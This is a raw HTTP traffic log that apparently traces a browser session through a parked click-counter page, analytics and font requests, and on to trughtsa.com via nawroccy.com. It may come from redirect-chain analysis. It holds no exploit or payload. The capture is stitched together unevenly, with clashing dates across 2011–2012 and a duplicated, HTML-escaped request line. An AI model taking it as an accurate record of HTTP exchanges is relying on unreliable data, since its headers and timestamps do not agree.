Date: Fri, 02 Dec 2011 00:46:06 GMT
Last-Modified: Wed, 19 Oct 2011 15:56:53 GMT
Expires: Fri, 02 Dec 2011 01:46:06 GMT
Cache-Control: max-age=3600, public
Accept-Ranges: bytes
Age: 2188
X-Amz-Cf-Id: D07_GHzwo7zW9JBzV6jTI9h5JgiI27fJGhvp3RUIJzTC-PyyX1Ggxg==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /themes/cleanblack/img/header.jpg HTTP/1.1

Host: a3.cdnpark.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://a3.cdnpark.com/themes/cleanblack/style.css
 
HTTP/1.0 200 OK

Content-Type: image/jpeg

Content-Length: 25667
Connection: keep-alive
Server: nginx
Date: Mon, 11 Jun 2012 09:48:36 GMT
Last-Modified: Wed, 19 Oct 2011 15:56:53 GMT
Expires: Mon, 11 Jun 2012 10:48:36 GMT
Cache-Control: max-age=3600, public
Accept-Ranges: bytes
Age: 2188
X-Amz-Cf-Id: dxye7FRCwN2gl5j2dd-Ye6AUF8HtXvnfFVOcMVhwTIVkCxNSmTmgBg==
Via: 1.0 1f198062fe4f9a91a90c6f00b1d03f52.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
 
HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Mon, 05 Nov 2012 13:09:56 GMT
Expires: Tue, 06 Nov 2012 01:09:56 GMT
Vary: Accept-Encoding
Age: 20386
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /static/fonts/ubuntu/v4/_xyN3apAT_yRRDeqB3sPRg.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Ubuntu
Origin: http://internetcountercheck.com
 
HTTP/1.1 200 OK

Content-Type: font/woff

Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Thu, 01 Nov 2012 01:10:23 GMT
Expires: Fri, 01 Nov 2013 01:10:23 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 42892
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 409159
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=549452586&utmhn=internetcountercheck.com&utme=8(Theme*Theme%20Type*Category%20ID*5!domty)9(CleanBlack*two*0*5!ascii)11(1)&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=internetcountercheck.com&utmhid=1681671856&utmr=0&utmp=%2F%3Fclick%3D11330312&utmac=UA-23217265-1&utmcc=__utma%3D269721385.799169078.1352141383.1352141383.1352141383.1%3B%2B__utmz%3D269721385.1352141383.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=qx~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=549452586&amp;utmhn=internetcountercheck.com&amp;utme=8(Theme*Theme%20Type*Category%20ID*5!domty)9(CleanBlack*two*0*5!ascii)11(1)&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=internetcountercheck.com&amp;utmhid=1681671856&amp;utmr=0&amp;utmp=%2F%3Fclick%3D11330312&amp;utmac=UA-23217265-1&amp;utmcc=__utma%3D269721385.799169078.1352141383.1352141383.1352141383.1%3B%2B__utmz%3D269721385.1352141383.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=qx~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://internetcountercheck.com/?click=11330312
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 01 Nov 2012 01:41:56 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 407266
Server: GFE/2.0
GET /favicon.ico HTTP/1.1

Host: internetcountercheck.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __utma=269721385.799169078.1352141383.1352141383.1352141383.1; __utmb=269721385.1.10.1352141383; __utmc=269721385; __utmz=269721385.1352141383.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=269721385.|1=Theme=CleanBlack=1
 
HTTP/1.1 200 OK

Content-Type: image/x-icon

Server: nginx
Date: Mon, 05 Nov 2012 18:49:43 GMT
Content-Length: 0
Last-Modified: Thu, 06 Nov 2008 14:07:45 GMT
Connection: keep-alive
Accept-Ranges: bytes
GET /favicon.ico HTTP/1.1

Host: nawroccy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Connection: Keep-Alive
Content-Length: 182
Date: Mon, 05 Nov 2012 18:49:43 GMT
Server: IdeaWebServer/v0.80
GET / HTTP/1.1

Host: trughtsa.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://nawroccy.com/basia/45_zaniemysl/